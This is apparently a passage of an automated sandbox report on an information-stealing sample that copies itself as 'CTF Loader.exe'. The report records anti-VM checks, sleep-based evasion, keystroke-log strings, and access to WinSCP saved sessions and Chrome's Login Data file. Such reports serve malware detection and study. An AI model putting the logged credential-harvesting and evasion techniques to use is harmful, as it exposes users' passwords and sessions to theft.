Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: ZOYGRL1ePa.exe PID: 6972, type: MEMORYSTR

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Memory allocated: 13B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Memory allocated: 14D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Memory allocated: BB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Memory allocated: 25C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Memory allocated: 2390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Memory allocated: 1720000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Memory allocated: 3090000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Memory allocated: 5090000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599715	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599607	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599360	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 599530	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 599313	Jump to behavior

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Window / User API: threadDelayed 2772	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Window / User API: threadDelayed 7004	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Window / User API: threadDelayed 4733	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Window / User API: threadDelayed 4832	Jump to behavior

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe TID: 5816	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe TID: 5816	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe TID: 5816	Thread sleep time: -599859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe TID: 5816	Thread sleep time: -599715s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe TID: 5816	Thread sleep time: -599607s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe TID: 5816	Thread sleep time: -599500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe TID: 5816	Thread sleep time: -599360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe TID: 5816	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe TID: 5816	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe TID: 5816	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe TID: 5816	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe TID: 7076	Thread sleep time: -37815825351104557s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe TID: 7076	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe TID: 7076	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe TID: 7076	Thread sleep time: -599750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe TID: 7076	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe TID: 7076	Thread sleep time: -599530s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe TID: 7076	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe TID: 7076	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe TID: 7076	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599715	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599607	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599360	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 599530	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: ZOYGRL1ePa.exe, 00000000.00000002.4112081547.0000000001272000.00000004.00000020.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4112028995.0000000000884000.00000004.00000020.00020000.00000000.sdmp, CTF Loader.exe, 00000005.00000002.2117421549.00000000066C0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

Code function: 0_2_06E7AEE0 LdrInitializeThunk,

0_2_06E7AEE0

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-^q
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (12/29/2024 21:28:09)</span></span><br>
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (12/29/2024 21:28:09)</span></span><br><font color=#008000>{Win}</font>r<font color=#008000>{Win}</font>rTHcq
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (12/29/2024 21:28:09)</span></span><br><font color=#008000>{Win}</font>r<font color=#008000>{Win}</font>THcq
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (12/29/2024 21:28:09)</span></span><br><font color=#008000>{Win}</font>rTHcq
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (12/29/2024 21:28:09)</span></span><br><font color=#008000>{Win}</font>THcq

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Queries volume information: C:\Users\user\Desktop\ZOYGRL1ePa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
